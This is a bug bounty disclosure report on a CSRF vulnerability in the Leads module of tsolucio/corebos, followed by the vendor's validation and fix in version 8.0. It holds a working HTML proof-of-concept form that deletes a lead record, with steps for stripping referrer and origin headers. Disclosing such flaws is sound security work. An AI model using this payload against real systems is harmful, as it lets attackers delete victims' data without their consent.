Cross-Site Request Forgery (CSRF) in tsolucio/corebos


Reported on

Jul 21st 2022


CSRF is still possible on the Leads module

Detailed Video is attached (Proof of concept).

Tested from: Firefox

URL of Demo :

Proof of Concept

Video Link :

Steps Involved

  1. Create one & after that, intercept the request
  2. Capture the delete request
  3. Remove The headers: Origin, Referer, Sec-Fetch-Site
  4. Add <meta name="referrer" content="no-referrer"> with CSRF-PoC
  5. Done


  <script>history.pushState('', '', '/')</script>
    <form action="" method="POST">
      <input type="hidden" name="&#95;&#95;vt5rftk" value="sid&#58;b523b60fa9a701abf87cd1d76a6facf8ac8f83a0&#44;1658428539" />
      <input type="hidden" name="allselectedboxes" value="" />
      <input type="hidden" name="from&#95;link" value="DetailView" />
      <input type="hidden" name="cbfromid" value="44845" />
      <input type="hidden" name="module" value="Leads" />
      <input type="hidden" name="record" value="44845" />
      <input type="hidden" name="isDuplicate" value="false" />
      <input type="hidden" name="action" value="Delete" />
      <input type="hidden" name="return&#95;module" value="Leads" />
      <input type="hidden" name="return&#95;id" value="" />
      <input type="hidden" name="return&#95;action" value="index" />
      <input type="hidden" name="lead&#95;id" value="44845" />
      <input type="hidden" name="parent&#95;id" value="44845" />
      <input type="hidden" name="email&#95;directing&#95;module" value="" />
      <input type="hidden" name="emailids" value="44845&#64;46&#124;" />
      <input type="hidden" name="pmodule" value="Leads" />
      <input type="hidden" name="cbcustominfo1" value="" />
      <input type="hidden" name="cbcustominfo2" value="" />
       <meta name="referrer" content="no-referrer">
      <input type="submit" value="Submit request" />


Cross-site request for the deletion of leads

We are processing your report and will contact the tsolucio/corebos team within 24 hours. 4 months ago
We have contacted a member of the tsolucio/corebos team and are waiting to hear back 4 months ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. 4 months ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. 4 months ago
We have sent a third and final follow up to the tsolucio/corebos team. This report is now considered stale. 4 months ago
Joe Bordes validated this vulnerability 3 months ago
Kiran PP has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Kiran PP
3 months ago


@maintainer @admin

After fixing, can we track it as a CVE ??

We have sent a fix follow up to the tsolucio/corebos team. We will try again in 7 days. 3 months ago
Joe Bordes marked this as fixed in 8.0 with commit d0bf45 3 months ago
Joe Bordes has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation